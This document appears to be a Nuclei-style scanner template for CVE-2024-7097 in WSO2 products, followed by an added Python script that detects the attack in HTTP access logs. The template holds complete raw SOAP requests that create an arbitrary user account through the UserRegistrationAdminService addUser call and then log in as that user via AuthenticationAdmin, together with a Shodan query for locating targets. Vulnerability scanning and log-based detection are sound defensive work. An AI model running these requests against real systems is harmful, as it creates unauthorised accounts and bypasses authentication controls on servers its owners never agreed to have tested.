Vulnerability Description
The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
id: CVE-2024-7097

info:
  name: WSO2 User Registration - Arbitrary Account Creation
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
  reference:
    - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
  classification:
    epss-score: 0.00391
    epss-percentile: 0.59448
  metadata:
    verified: true
    max-request: 2
    shodan-query: "WSO2 Carbon Server"
  tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev

variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "urn:addUser"
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:xsd="http://org.apache.axis2/xsd">
          <soapenv:Header/>
          <soapenv:Body>
            <xsd:addUser>
              <xsd:user>
                <xsd:userName>{{username}}</xsd:userName>
                <xsd:password>{{password}}</xsd:password>
              </xsd:user>
            </xsd:addUser>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: status
        status:
          - 202
        internal: true

  - raw:
      - |
        POST /services/AuthenticationAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:aut="http://authentication.services.core.carbon.wso2.org">
          <soapenv:Header/>
          <soapenv:Body>
            <aut:login>
              <aut:username>{{username}}</aut:username>
              <aut:password>{{password}}</aut:password>
            </aut:login>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: word
        words:
          - "loginResponse"
          - "<ns:return>true</ns:return>"
        condition: and
# digest: 4a0a00473045022100decbb867a0f53f5be565ad425e45a72cfb9639ddba93296163d36b51fc69038502207165b5e8a64efd5746f0384a1e5a1c73cd71c7d305e687620e4fe65097942fbb:922c64590222798bb761d5b6d8e72950
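The two-step flow above (an accepted `addUser` call on the UserRegistrationAdminService endpoint, then an AuthenticationAdmin login with the new credentials) leaves a recognisable trace in HTTP access logs. The script below is an added detection example, not part of the template or of WSO2's own tooling; it assumes combined-log-format access lines (the layout and the log lines are constructed here) and flags clients that hit the registration endpoint, noting whether the server accepted the request with 202 and whether a login from the same address followed within a short window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in a combined-log-like layout (assumed format, not
# taken from a real deployment). Bodies are not logged, so detection keys on
# method, path and status rather than on the SOAP payload.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2025:10:00:01 +0000] "POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1" 202 0
203.0.113.7 - - [10/Jan/2025:10:00:03 +0000] "POST /services/AuthenticationAdmin HTTP/1.1" 200 512
198.51.100.4 - - [10/Jan/2025:10:05:00 +0000] "GET /carbon/admin/login.jsp HTTP/1.1" 200 3012
198.51.100.4 - - [10/Jan/2025:10:05:09 +0000] "POST /services/AuthenticationAdmin HTTP/1.1" 200 512
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
REGISTRATION_PATH = "/services/UserRegistrationAdminService"  # endpoint used by the template
LOGIN_PATH = "/services/AuthenticationAdmin"


def parse(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def find_registration_attempts(log_text, window=timedelta(minutes=5)):
    """One finding per POST to the registration endpoint. 'accepted' mirrors the
    template's first matcher (HTTP 202); 'login_followed' is true when the same
    IP posted to AuthenticationAdmin within `window` afterwards, which mirrors
    the template's second step. With self-registration disabled, any accepted
    request here deserves investigation regardless of the login flag."""
    events = [e for e in map(parse, log_text.splitlines()) if e]
    logins = defaultdict(list)
    for ip, ts, method, path, _ in events:
        if method == "POST" and path.startswith(LOGIN_PATH):
            logins[ip].append(ts)
    findings = []
    for ip, ts, method, path, status in events:
        if method == "POST" and path.startswith(REGISTRATION_PATH):
            followed = any(ts <= lt <= ts + window for lt in logins[ip])
            findings.append({"ip": ip, "registered_at": ts.isoformat(),
                             "accepted": status == 202, "login_followed": followed})
    return findings
```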